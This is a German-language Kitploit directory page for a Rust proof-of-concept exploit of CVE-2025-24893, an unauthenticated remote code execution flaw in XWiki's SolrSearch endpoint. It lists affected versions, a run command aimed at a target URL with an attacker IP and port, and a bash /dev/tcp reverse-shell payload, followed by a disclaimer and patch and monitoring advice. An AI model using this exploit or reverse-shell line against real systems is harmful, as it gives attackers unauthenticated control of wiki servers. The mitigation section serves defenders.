Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-24893-poc — Proof-of-Concept-Exploit für CVE-2025-24893, eine nicht authentifizierte Remote Code Execution (RCE)-Sicherheitslücke in XWiki. Nutzt eine Template-Injection-Schwachstelle im SolrSearch-Endpunkt über die Ausführung von Groovy-Skripten aus. | Kitploit
Tools/GitHubGitHub/investigato/cve-2025-24893-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubinvestigato/cve-2025-24893-poc

cve-2025-24893-poc

Proof-of-Concept-Exploit für CVE-2025-24893, eine nicht authentifizierte Remote Code Execution (RCE)-Sicherheitslücke in XWiki. Nutzt eine Template-Injection-Schwachstelle im SolrSearch-Endpunkt über die Ausführung von Groovy-Skripten aus.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

CVE-2025-24893 — XWiki Unauthenticated RCE (PoC)

Proof-of-Concept-Exploit für CVE-2025-24893, eine kritische Remote Code Execution-Schwachstelle ohne Authentifizierung in XWiki.
Dieser Exploit missbraucht eine Groovy-Template-Injection im SolrSearch-Endpunkt, um ohne Authentifizierung beliebige Befehle auszuführen – einschließlich Reverse Shells.

💥 Schwachstellendetails

Ein Fehler in der Art und Weise, wie XWiki manipulierte Eingaben an den SolrSearch-RSS-Endpunkt verarbeitet, ermöglicht Angreifern, Groovy-Code in die Rendering-Pipeline einzuschleusen.
Dies ermöglicht unauthorisierte RCE über {{groovy}}-Skriptblöcke.

✅ Betroffene Versionen

  • < 15.10.11
  • >= 16.0.0 und < 16.4.1

❌ Behoben in

  • 15.10.11
  • 16.4.1

🔧 Verwendung

Laden Sie das Release herunter:

Releases

oder bauen Sie es aus dem Quellcode:

root@kitploit:~
cargo build --release
./target/release/cve-2025-24893-gato --url http://target --ip 10.10.10.10 --port 4444

Reverse-Shell-Payload

Es gibt einen vorgefertigten Reverse-Shell-Payload in dieser Form:

bash -c 'sh -i >& /dev/tcp/{IP}/{PORT} 0>&1


⚠️ Rechtlicher Hinweis

Dieser Code ist nur für Bildungszwecke und autorisierte Sicherheitsforschung bestimmt. Verwenden Sie diesen Exploit nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.


✍️ Danksagungen

  • Exploit-PoC von Artemir7
  • Rust-Port von investigato

🛡️ Erkennung & Abhilfe

  • Aktualisieren Sie auf XWiki 15.10.11 oder 16.4.1+
  • Überwachen Sie verdächtige Nutzung von /bin/get/Main/SolrSearch?media=rss
  • Deaktivieren Sie die Groovy-Ausführung für anonyme Benutzer, falls möglich
Tool herunterladen